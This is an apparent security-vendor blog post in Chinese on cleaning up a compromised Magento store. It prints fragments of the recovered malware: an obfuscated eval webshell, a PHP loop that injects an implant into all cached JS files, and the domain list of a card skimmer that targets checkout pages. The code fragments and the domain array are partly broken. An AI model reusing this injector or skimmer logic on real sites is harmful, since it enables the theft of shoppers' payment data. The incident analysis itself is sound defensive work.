域名預(yù)訂/競(jìng)價(jià),好“米”不錯(cuò)過(guò)
Magento是最受歡迎的外貿(mào)電商框架之一,很多企業(yè)已經(jīng)在其基礎(chǔ)上進(jìn)行了二次開發(fā)。然而,對(duì)于使用2.x版本的老系統(tǒng)來(lái)說(shuō),安全問(wèn)題也成為了一大難題。有些客戶在找我們SINESAFE做網(wǎng)站安全服務(wù)之前,客戶也找過(guò)建站的公司去清除后門,建站公司也將系統(tǒng)遷移升級(jí)到了最新的2.4.4版本,但后來(lái)發(fā)現(xiàn)問(wèn)題并沒(méi)有完全的解決,還是會(huì)反復(fù)的被篡改代碼和用戶的支付頁(yè)面被劫持跳轉(zhuǎn),問(wèn)題的根源是代碼里已經(jīng)被黑客植入后門了,數(shù)據(jù)庫(kù)也被留了木馬病毒,這個(gè)時(shí)候不光是要升級(jí)magento到最新版本,還得要把木馬后門給徹底的清理掉,做好安全加固和防護(hù),才能徹底的解決這個(gè)問(wèn)題。
因?yàn)?022年以前的Maganto 2.x版本存在很多漏洞,像遠(yuǎn)程代碼執(zhí)行漏洞、SQL注入漏洞都是比較高危的,如果不及時(shí)升級(jí)到2.x版本就很容易被黑客攻擊。但是,即使升級(jí)到2.x版本,也不代表完全解決了安全問(wèn)題。因此,針對(duì)這種情況,企業(yè)需要認(rèn)真評(píng)估自身的安全風(fēng)險(xiǎn),并采取措施進(jìn)行安全加固。具體來(lái)說(shuō),可以通過(guò)加強(qiáng)訪問(wèn)控制、強(qiáng)化數(shù)據(jù)保護(hù)等方式來(lái)提高系統(tǒng)安全性。同時(shí),定期對(duì)系統(tǒng)進(jìn)行漏洞掃描和代碼安全審計(jì),及時(shí)修補(bǔ)代碼漏洞和加強(qiáng)網(wǎng)站的安全防護(hù),也是減輕安全風(fēng)險(xiǎn)的有效措施。
我們SINE安全處理了很多外貿(mào)客戶使用magento被黑客入侵的安全問(wèn)題,雖然在國(guó)內(nèi)Magento并不被廣泛使用,但它在國(guó)外卻十分流行。然而,一些老版本的Magento很容易被攻擊者通過(guò)框架拿shell等方式入侵。以下就是我們SINE安全處理客戶的magento被黑客攻擊的過(guò)程記錄:
排查黑客攻擊的問(wèn)題時(shí),很容易陷入只分析日志等細(xì)節(jié)的誤區(qū)。其實(shí),在進(jìn)行任何分析之前,我們都需要先做以下幾件事情:
第一,核實(shí)信息。這就像是我們?cè)谡义e(cuò)問(wèn)題之前,需要先了解出現(xiàn)問(wèn)題的具體細(xì)節(jié)和當(dāng)前服務(wù)器的環(huán)境情況。
第二,斷開服務(wù)器的外網(wǎng)鏈接,保障安全。這就像是把自家的大門關(guān)上,不讓壞人輕松進(jìn)入。
第三,保存服務(wù)器的環(huán)境,以及現(xiàn)場(chǎng)的各種信息,如端口網(wǎng)絡(luò)、應(yīng)用程序、日志文件等。這樣,就像是在證據(jù)鏈中留下關(guān)鍵的線索,更有利于我們查找和分析問(wèn)題,而且要注意不要有寫操作哦!
在現(xiàn)場(chǎng)環(huán)境中,雖然我們可能無(wú)法找到確切的問(wèn)題所在,但是可以通過(guò)查看歷史日志,來(lái)檢查是否存在服務(wù)器linux系統(tǒng)被提權(quán)等可疑行為。如果使用了chkrootkit、rkthunter和lynis等安全掃描工具,也未發(fā)現(xiàn)任何問(wèn)題,那還是建議客戶考慮更換服務(wù)器,以避免潛在的安全風(fēng)險(xiǎn)。
我們SINE安全首先從web層面去看,分析了網(wǎng)站訪問(wèn)日志,nginx日志,數(shù)據(jù)庫(kù)日志發(fā)現(xiàn)有許多黑客攻擊的痕跡,利用的都是Magento的一些高危漏洞進(jìn)行的,也可以說(shuō)明網(wǎng)站被入侵是由于magento低版本存在漏洞導(dǎo)致,我們立即展開對(duì)系統(tǒng)以及源代碼的安全審計(jì),人工去分析每一行代碼,通過(guò)我們的檢測(cè),發(fā)現(xiàn)4個(gè)木馬后門,如下:
bmMo\1122\x46jdGl\x76bicgLi\101kX1BP\x551R\x62\1122\105\x6e\x58\123k7CmV4aXQ7Cg=\075"; eval(_decode($VKGPOZ)); ?>
foreach (glob("/www/wwwroot/dev.******.com/pub/static/_cache/merged/*.js") as $filename) {
if (!preg_match("/lG68xv3NXN/", file_get_contents($filename))) {
file_put_contents($filename, _decode($implant), FILE_APPEND);
echo "updated: {$filename}\n";
} else {
echo "ok: {$filename}\n";
}
}
通過(guò)上面的代碼我們可以發(fā)現(xiàn)都是一些webshell木馬后門,像filemanPHP大馬,一句話木馬,以及定時(shí)篡改網(wǎng)站全部JS功能的代碼,通過(guò)分析,我們SINE安全發(fā)現(xiàn)黑客入侵的目的不是為了掛馬和掛黑鏈,而是為了盜取用戶的信用卡信息,用于盜刷。我們對(duì)黑客植入到JS的代碼進(jìn)行了分析與解密,發(fā)現(xiàn)該JS代碼是用來(lái)記錄用戶的信用卡信息,針對(duì)Magento支付相關(guān)頁(yè)面(onepage|checkout|onestep|payment|transaction)中所有的表單信息,也會(huì)判斷來(lái)路是從
const domains =["securecode.com","psncdn.com","googleadservices.com","googletagmanager.com","google.com"];"apprater.net","shopperapproved.com","chromecast-setup.com","ssl-images-amazon.com","google.com"];的用戶,會(huì)將信用卡的信息POST發(fā)送到黑客的指定網(wǎng)站上。
看來(lái)黑客的目的就是為了要盜取用戶的信用卡信息,用于盜刷來(lái)獲取巨大的利益。道高一尺魔高一丈,我們SINE安全十多年來(lái)一直與黑灰產(chǎn)進(jìn)行對(duì)抗,通過(guò)此次幫客戶處理的magento的安全問(wèn)題,我們又總結(jié)了新的經(jīng)驗(yàn),也希望分享這個(gè)處理過(guò)程讓大家有所收獲。
申請(qǐng)創(chuàng)業(yè)報(bào)道,分享創(chuàng)業(yè)好點(diǎn)子。點(diǎn)擊此處,共同探討創(chuàng)業(yè)新機(jī)遇!